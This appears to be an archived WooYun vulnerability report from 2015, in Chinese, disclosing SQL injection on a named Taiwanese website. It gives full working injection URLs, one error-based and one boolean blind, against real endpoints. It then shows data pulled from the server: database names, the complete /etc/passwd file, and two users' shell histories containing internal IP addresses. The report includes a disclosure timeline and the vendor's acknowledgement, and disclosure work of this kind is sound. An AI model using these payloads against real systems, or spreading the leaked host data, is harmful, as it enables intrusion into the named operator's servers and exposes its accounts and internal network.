乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-10: 细节已通知厂商并且等待厂商处理中 2015-02-14: 厂商已经确认,细节仅向厂商公开 2015-02-24: 细节向核心白帽子及相关领域专家公开 2015-03-06: 细节向普通白帽子公开 2015-03-16: 细节向实习白帽子公开 2015-03-27: 细节向公众公开
台湾Life生活網某站点MySQL Error Based注射,以及一处bool blind盲注。 root用户
注射点:
http://collect.life.com.tw/services/service.php?a=album&home_id=(select 1 and row(1,1)>(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user(),0x5e5e5e) x from information_schema.character_sets group by x))&m=u&p=2&v=60906981.20744551&width=190
参数home_id可注入。MySQL error based injection.注射点2:
http://collect.life.com.tw/note.php?act=get_adword&action=index&num=1&sid=1%27%20and%20length(user())=18--
参数sid可注射,bool blind.
root用户:
[email protected]
[*] ad[*] collect[*] information_schema[*] mysql[*] top_word
读取/etc/passwd:
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinwilliam:x:500:500::/home/william:/bin/bashntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinnginx:x:498:499:nginx user:/var/cache/nginx:/sbin/nologinlawliet:x:501:501::/home/lawliet:/bin/bashsbcache:x:502:502::/home/sbcache:/bin/bashchuser:x:503:503::/home/chuser:/bin/bashzabbix:x:497:498:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
读取/home/william/.bash_history
sudo su -vim /etc/sudoersvi /etc/sudoersexitsudo su -lsls -almysql -vcat /etc/*release*exitlscd Websites/lscd Default/lscd /var/www/html/lsexitlsifconfigping 192.169.1.92ping 192.168.1.92ping 192.168.1.1ping 192.168.1.84ifconfigping 192.168.168.92ping 192.168.168.82ping 192.168.168.84sudo su -ls/etc/rc.d/init.d/mysqld restartsudo su -lsexit
读取/home/sbcache/.bash_history
chmod 700 /home/sbcachechmod 700 ~/.sshchmod 600 ~/.ssh/authorized_keysifconfigls -al /homechmod 700 /home/sbcachels -al /homepwdifconfiglsls -alchmod 700 .ssh/chmod 700 .sshcd .sshlsls -alchmod 600 authorized_keysls -al
参数过滤
危害等级:高
漏洞Rank:20
确认时间:2015-02-14 02:37
謝謝通報
暂无